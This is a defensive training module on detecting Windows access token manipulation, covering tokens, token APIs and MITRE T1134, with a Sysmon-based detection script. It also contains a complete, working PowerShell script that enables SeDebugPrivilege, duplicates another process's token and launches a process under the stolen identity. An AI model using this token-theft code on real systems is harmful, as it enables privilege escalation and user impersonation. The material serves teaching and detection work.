
Detecting Access Token Manipulation Attacks

This module focuses on Windows privilege escalation techniques through access token manipulation. It covers various topics, including Windows processes, access tokens, token privileges, and token manipulation. By using tools such as API Monitor, Process Monitor, Sysmon, WinDbg, and disassemblers for analysis, we will investigate the relevant event logs and telemetry generated through Event Tracing for Windows (ETW).


Created by MadhukarRaina

Difficulty: Hard | Category: Defensive

Summary

This module is centered on understanding access tokens and the attacks built on them, such as access token manipulation, access token theft, and token impersonation. Participants will also gain hands-on experience using WinDbg and other tools to analyze processes, tokens, and security descriptors, and to monitor the Windows API calls that create and manipulate tokens.

This module is broken down into sections with accompanying hands-on exercises to practice each of the techniques we cover. The module ends with a practical hands-on skills assessment to gauge your understanding of the various topic areas.

  • Introduction
  • Intro to Toolset
  • Windows Logon Process
  • Process Internals and Protection
  • Understanding Access Tokens
  • Important Token Structures
  • Access Checks
  • Token Privileges
  • Token Enumeration
  • Token Manipulation
  • Token Theft (T1134.001)
  • Token Impersonation
  • Make Access Tokens
  • Network Authentication
  • PPID Spoofing using Access Token
  • Detection Opportunities

Students will also gain insight into the inner workings of access tokens, process creation, parent process ID (PPID) spoofing, and the role of access control lists (ACLs) and security descriptors in securing system resources. Furthermore, the module covers the techniques used to create new tokens from user credentials, ways to duplicate tokens, creating new processes with stolen tokens, and token impersonation.

There are also some useful scenarios covered in the module, such as the demonstration and detection of token manipulation, escalation to "NT AUTHORITY\SYSTEM", and scenarios demonstrating how kernel drivers detect attacks such as PPID spoofing. As you work through the module, you will see example commands and command output for the various topics introduced. It is worth reproducing as many of these examples as possible to further reinforce the concepts introduced in each section. You can do this in the Pwnbox provided in the interactive sections or on your own virtual machine.

You can start and stop the module at any time and pick up where you left off. There is no time limit or "grading," but you must complete all of the exercises and the skills assessment to receive the maximum number of cubes and have this module marked as complete in any paths you have chosen.

The module is classified as "Hard" because it assumes working knowledge of debuggers and analysis tools and familiarity with the Windows command line.

A firm grasp of the following modules can be considered a prerequisite for successful completion of this module:

  • Introduction to Windows Command Line
  • Introduction to Malware Analysis
  • Intro to Assembly Language
  • Basic understanding of C

Introduction

Authentication and authorization are foundational concepts that address two fundamental questions in security:

  • Authentication (Is the entity who it claims to be?): Authentication ensures that the identity of a user, system, or service is genuine. This verification is typically carried out using methods such as passwords, biometrics, or digital certificates. Authentication acts as the initial checkpoint for establishing trust between entities.

  • Authorization (What is the entity allowed to do?): Once authentication is successful, authorization defines the scope of actions or resources the entity is permitted to access. It enforces access controls to ensure that users, applications, or systems operate within their designated permissions.

In Windows environments, authentication and authorization are structured around security principals. A security principal is any entity that can initiate an action or request: users, computers, groups, and services. To implement authentication and authorization, Windows relies on two key mechanisms: logon sessions and access tokens.

  • Logon Session: A logon session is created by the Local Security Authority (LSA) whenever a user successfully signs in to a system. It is identified by a locally unique identifier (the logon ID, a LUID) and holds the authenticated identity and the credential material cached for that logon. Every access token issued for that logon refers back to the session through this LUID, which is what lets the system tie a process back to the logon that spawned it.

  • Access Token: After authentication, the LSA generates an access token, which serves as the security context for the user's processes and threads. This token contains essential details, such as:

    • The user’s unique identifier (SID)
    • Membership in security groups
    • Assigned privileges
    • Integrity levels and associated claims

Access tokens are associated with processes or threads and govern what resources they can access and the actions they can execute. A deeper understanding of tokens is essential for understanding access token manipulation. According to MITRE, Access Token Manipulation (T1134) falls under the Privilege Escalation (TA0004) and Defense Evasion (TA0005) tactics. This involves an adversary manipulating access tokens to bypass access controls and gain unauthorized access to resources within a system or network.

Access Token Manipulation Techniques

The diagram below shows some common access token manipulation scenarios, which include how an access token is stolen from a target process and how an access token is created using stolen credentials. Once the access token is obtained, it can be used to perform further actions (such as PPID Spoofing (T1134.004)). The access token manipulation techniques shown in the diagram below are:

  • Token Privilege Modification
  • Create Process with Token
  • Token Impersonation

Scenarios

This module presents a comprehensive analysis of access token manipulation techniques used by attackers and provides guidance on detecting these threats.

Access token manipulation is a prevalent strategy used by adversaries to escalate privileges and avoid detection in Windows environments. The MITRE ATT&CK page for Access Token Manipulation (T1134) provides, in its Procedure Examples section, detailed information on how various threat actors execute the technique and its sub-techniques.

For instance, the screenshot above demonstrates how adversaries manipulate an access token and enable specific privileges, such as SeDebugPrivilege. Holding this privilege lets a process open any process or thread regardless of the object's security descriptor, including processes owned by other users or running as SYSTEM, which is why it is the usual first step before token theft.

We can also observe that the AdjustTokenPrivileges() WinAPI function is used. This function enables or disables privileges in an access token. The important caveat is that it cannot add a privilege the token does not already contain: if the privilege is missing, the call returns TRUE but sets the last error to ERROR_NOT_ALL_ASSIGNED (1300). Adversaries therefore use it to switch on privileges that the account already holds but that are disabled by default (such as SeDebugPrivilege for members of Administrators), thereby unlocking capabilities needed for further malicious actions.

There are also attempts to escalate privileges to NT AUTHORITY\SYSTEM (the LocalSystem account), the most privileged account on a Windows host and loosely comparable to root or the superuser on Unix-based systems. Adversaries often target this account to gain full control over a compromised system.

Adversaries have also employed access token manipulation techniques to create new tokens from stolen credentials. They have used impersonation to access resources or perform actions that require higher privileges than those of the current user. This technique involves a thread assuming the identity of another user or security principal, typically to perform actions on their behalf. The screenshot below provides examples of various software/groups that have utilized this technique in real-world attacks.
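A process started from a stolen or newly made token runs under an account that differs from the account of the process that created it, and that mismatch is visible in process-creation telemetry. The following is an added example, not code or a rule from the module: a PowerShell check over Sysmon Event ID 1 (ProcessCreate) records that flags children whose User differs from their parent's, while suppressing parents that legitimately switch users. The event records are constructed sample data with Sysmon's field names, not captured logs, and the list of known user-switching parents is an assumption to be tuned per estate.

```powershell
# Added example (not from the module). Constructed Sysmon Event ID 1 records:
# winlogon -> userinit (legitimate user switch) -> explorer -> powershell ->
# cmd.exe running as SYSTEM, which is what a stolen-token spawn looks like.
$Events = @(
    [pscustomobject]@{ ProcessId = 640;  ParentProcessId = 512;  User = 'NT AUTHORITY\SYSTEM'; Image = 'C:\Windows\System32\winlogon.exe' }
    [pscustomobject]@{ ProcessId = 700;  ParentProcessId = 640;  User = 'LAB\alice';           Image = 'C:\Windows\System32\userinit.exe' }
    [pscustomobject]@{ ProcessId = 5120; ParentProcessId = 700;  User = 'LAB\alice';           Image = 'C:\Windows\explorer.exe' }
    [pscustomobject]@{ ProcessId = 6212; ParentProcessId = 5120; User = 'LAB\alice';           Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' }
    [pscustomobject]@{ ProcessId = 7016; ParentProcessId = 6212; User = 'NT AUTHORITY\SYSTEM'; Image = 'C:\Windows\System32\cmd.exe' }
)

# Assumption: parents that legitimately create children under another account
# (logon chain, service control manager, Secondary Logon / runas, UAC consent).
$KnownSwitchers = @('winlogon.exe', 'userinit.exe', 'wininit.exe', 'services.exe', 'runas.exe', 'consent.exe')

function Find-UserSwitch {
    param([Parameter(Mandatory)][object[]]$ProcessCreateEvents)

    # Index by ProcessId so each child can look up the record of its parent.
    $byPid = @{}
    foreach ($e in $ProcessCreateEvents) { $byPid[[int]$e.ProcessId] = $e }

    foreach ($child in $ProcessCreateEvents) {
        $parent = $byPid[[int]$child.ParentProcessId]
        if (-not $parent) { continue }                  # parent not in this batch
        if ($parent.User -eq $child.User) { continue }  # same account, nothing to see
        if ($KnownSwitchers -contains (Split-Path -Leaf $parent.Image)) { continue }

        [pscustomobject]@{
            ChildPid    = $child.ProcessId
            ChildImage  = $child.Image
            ChildUser   = $child.User
            ParentPid   = $parent.ProcessId
            ParentImage = $parent.Image
            ParentUser  = $parent.User
            Reason      = 'child runs under a different account than its parent'
        }
    }
}

# On the sample above this yields exactly one hit: cmd.exe (7016) as SYSTEM
# under powershell.exe (6212) running as LAB\alice.
Find-UserSwitch -ProcessCreateEvents $Events | Format-Table -AutoSize
```

The check only sees the variants that create a process; pure thread impersonation leaves no new process behind and has to be caught on the API or ETW side instead. It also needs the parent's own creation event in the same batch, so feed it a window of events wide enough to contain the whole chain rather than a single record.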

API Functions Related to Access Tokens

API functions related to access tokens allow applications to manage and manipulate these tokens, enabling scenarios like impersonation, privilege elevation, and security checks. Some key API functions related to access tokens are categorized as follows:

Token Creation

These functions obtain handles to existing tokens or derive new tokens from them:

Function Name | Description
OpenProcessToken | Opens the primary access token of a process.
OpenThreadToken | Opens the impersonation token of a thread; fails with ERROR_NO_TOKEN if the thread is not currently impersonating.
DuplicateToken | Duplicates an existing token as an impersonation token at the requested impersonation level.
DuplicateTokenEx | Duplicates a token while letting the caller choose the access rights, the impersonation level, and the token type (primary or impersonation); this is the call that turns a stolen token into a primary token usable for process creation.
CreateRestrictedToken | Creates a restricted token by removing privileges, marking SIDs as deny-only, or adding restricting SIDs.

Token Manipulation

These functions modify or adjust the properties and privileges of tokens:

Function Name | Description
AdjustTokenPrivileges | Enables or disables privileges that are already present in a token; it cannot add new ones.
AdjustTokenGroups | Enables or disables groups in a token; groups flagged as mandatory cannot be disabled.
SetTokenInformation | Changes properties of a token, such as its default DACL, owner, primary group, integrity level, or session ID (changing the session ID requires SeTcbPrivilege).

Token Query

These functions retrieve information about a token:

Function Name | Description
GetTokenInformation | Retrieves information about a token, such as its user, groups, privileges, owner, integrity level, or elevation type.
CheckTokenMembership | Checks whether a specified SID is enabled in a token (or in the calling thread's impersonation token when no handle is supplied).
IsTokenRestricted | Determines whether a token contains a list of restricting SIDs, i.e. whether it was produced by CreateRestrictedToken.

Token Impersonation

These functions allow threads to take on another security context:

Function Name | Description
ImpersonateLoggedOnUser | Lets the calling thread impersonate the security context of a logged-on user, given a handle to that user's primary or impersonation token.
ImpersonateSelf | Gives the calling thread an impersonation token that is a copy of the process token, so privileges can be adjusted on the thread without touching the process token.
RevertToSelf | Ends impersonation, reverting the thread to the process's primary security context.

Miscellaneous

Other important functions related to tokens:

Function Name | Description
LogonUser | Authenticates a user by name, domain, and password and returns a primary token for that user; with the LOGON32_LOGON_NEW_CREDENTIALS logon type the token keeps the caller's local identity but presents the supplied credentials to the network (the "make token" scenario).
CreateProcessAsUser | Creates a new process running under the supplied primary token; normally requires SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege, which service accounts hold but interactive users usually do not.
CreateProcessWithTokenW | Also creates a process under the supplied primary token, but requires SeImpersonatePrivilege instead and delegates the creation to the Secondary Logon (seclogon) service; this is the path available to a caller that lacks SeAssignPrimaryTokenPrivilege.
SetThreadToken | Assigns an impersonation token to a thread (or removes it when passed NULL).

Refer to the Microsoft documentation on access tokens and the Win32 authorization functions for full signatures, required access rights, and privilege requirements.
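The functions in the tables above chain together into the scenario described earlier: enable SeDebugPrivilege with AdjustTokenPrivileges, open a target process, duplicate its token as a primary token with DuplicateTokenEx, and start a new process with CreateProcessWithTokenW. The following is an added example, not code from the module, that performs that chain from PowerShell through P/Invoke. It assumes an elevated PowerShell session on a lab host; the target PID is a placeholder and must belong to a process whose token you are entitled to duplicate in your lab (for example an elevated process you started yourself). Names such as TokenApi, Enable-TokenPrivilege, and Start-ProcessWithStolenToken are this example's own.

```powershell
# Added example (not from the module). P/Invoke surface for the token APIs
# used below; constants and struct layouts follow the Win32 definitions.
$Src = @"
using System;
using System.Runtime.InteropServices;
public static class TokenApi
{
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct LUID_AND_ATTRIBUTES { public LUID Luid; public uint Attributes; }
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID_AND_ATTRIBUTES Privileges; }
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO
    {
        public int cb; public string lpReserved, lpDesktop, lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }
    [StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }

    public const uint SE_PRIVILEGE_ENABLED = 0x2, TOKEN_ADJUST_PRIVILEGES = 0x20, TOKEN_QUERY = 0x8, TOKEN_DUPLICATE = 0x2,
                      TOKEN_ALL_ACCESS = 0xF01FF, PROCESS_QUERY_LIMITED_INFORMATION = 0x1000, CREATE_NEW_CONSOLE = 0x10;
    public const int SecurityImpersonation = 2, TokenPrimary = 1, ERROR_NOT_ALL_ASSIGNED = 1300;

    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES state, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool DuplicateTokenEx(IntPtr token, uint access, IntPtr attrs, int level, int type, out IntPtr dup);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool CreateProcessWithTokenW(IntPtr token, uint logonFlags, string app, string cmd, uint flags, IntPtr env, string dir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
}
"@
Add-Type -TypeDefinition $Src

function Get-LastError { [Runtime.InteropServices.Marshal]::GetLastWin32Error() }

# Step 1: enable a privilege the current token already holds (e.g. SeDebugPrivilege).
function Enable-TokenPrivilege([string]$Name) {
    $hTok = [IntPtr]::Zero
    if (-not [TokenApi]::OpenProcessToken([TokenApi]::GetCurrentProcess(), [TokenApi]::TOKEN_ADJUST_PRIVILEGES -bor [TokenApi]::TOKEN_QUERY, [ref]$hTok)) {
        throw "OpenProcessToken failed: $(Get-LastError)"
    }
    $luid = New-Object TokenApi+LUID
    if (-not [TokenApi]::LookupPrivilegeValue($null, $Name, [ref]$luid)) { throw "Unknown privilege name $Name" }
    $laa = New-Object TokenApi+LUID_AND_ATTRIBUTES
    $laa.Luid = $luid; $laa.Attributes = [TokenApi]::SE_PRIVILEGE_ENABLED
    $tp = New-Object TokenApi+TOKEN_PRIVILEGES
    $tp.PrivilegeCount = 1; $tp.Privileges = $laa
    $ok  = [TokenApi]::AdjustTokenPrivileges($hTok, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
    $err = Get-LastError
    [void][TokenApi]::CloseHandle($hTok)
    # AdjustTokenPrivileges cannot add a privilege: it returns TRUE with
    # ERROR_NOT_ALL_ASSIGNED (1300) when the token never contained $Name.
    if (-not $ok -or $err -eq [TokenApi]::ERROR_NOT_ALL_ASSIGNED) { throw "$Name is not present in this token (error $err)" }
    "$Name enabled"
}

# Step 2: open the target, duplicate its token as a primary token, spawn a process with it.
function Start-ProcessWithStolenToken([int]$TargetPid, [string]$CommandLine = 'cmd.exe') {
    $hProc = [TokenApi]::OpenProcess([TokenApi]::PROCESS_QUERY_LIMITED_INFORMATION, $false, $TargetPid)
    if ($hProc -eq [IntPtr]::Zero) { throw "OpenProcess($TargetPid) failed: $(Get-LastError)" }
    $hTok = [IntPtr]::Zero
    if (-not [TokenApi]::OpenProcessToken($hProc, [TokenApi]::TOKEN_DUPLICATE -bor [TokenApi]::TOKEN_QUERY, [ref]$hTok)) {
        throw "OpenProcessToken($TargetPid) failed: $(Get-LastError)"
    }
    # Process creation needs a primary token, so ask DuplicateTokenEx for TokenPrimary.
    $hDup = [IntPtr]::Zero
    if (-not [TokenApi]::DuplicateTokenEx($hTok, [TokenApi]::TOKEN_ALL_ACCESS, [IntPtr]::Zero, [TokenApi]::SecurityImpersonation, [TokenApi]::TokenPrimary, [ref]$hDup)) {
        throw "DuplicateTokenEx failed: $(Get-LastError)"
    }
    $si = New-Object TokenApi+STARTUPINFO
    $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $pi = New-Object TokenApi+PROCESS_INFORMATION
    # Needs SeImpersonatePrivilege in the caller; the work is done by the Secondary Logon service.
    if (-not [TokenApi]::CreateProcessWithTokenW($hDup, 0, $null, $CommandLine, [TokenApi]::CREATE_NEW_CONSOLE, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)) {
        throw "CreateProcessWithTokenW failed: $(Get-LastError)"
    }
    foreach ($h in @($pi.hThread, $pi.hProcess, $hDup, $hTok, $hProc)) { [void][TokenApi]::CloseHandle($h) }
    $pi.dwProcessId
}

# Usage (elevated PowerShell on a lab host; 1234 is a placeholder PID):
#   Enable-TokenPrivilege SeDebugPrivilege
#   Start-ProcessWithStolenToken -TargetPid 1234
```

Each step leaves telemetry that the later sections build on: the OpenProcess call shows up as a Sysmon Event ID 10 (ProcessAccess) from the PowerShell process with GrantedAccess containing 0x1000; the AdjustTokenPrivileges call produces Security event 4703 ("A token right was adjusted") when the "Audit Token Right Adjusted" subcategory is enabled; and the new process is recorded by Security event 4688 and Sysmon Event ID 1 with a User field naming the stolen identity rather than the account that ran the script. Note that SeDebugPrivilege only bypasses the process object's DACL; the token object's own DACL still has to grant TOKEN_DUPLICATE, which is why this works from an elevated administrator but not from a standard user.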


Moving On

To understand access tokens and the attack techniques based on them, we'll go through the fundamental concepts related to processes and tokens, explore different ways to create processes, and then examine the attack scenarios and respective detection opportunities in the following sections. In the upcoming section, we'll cover some basic concepts of WinDbg, debuggers, disassemblers, and other tools used throughout this module.
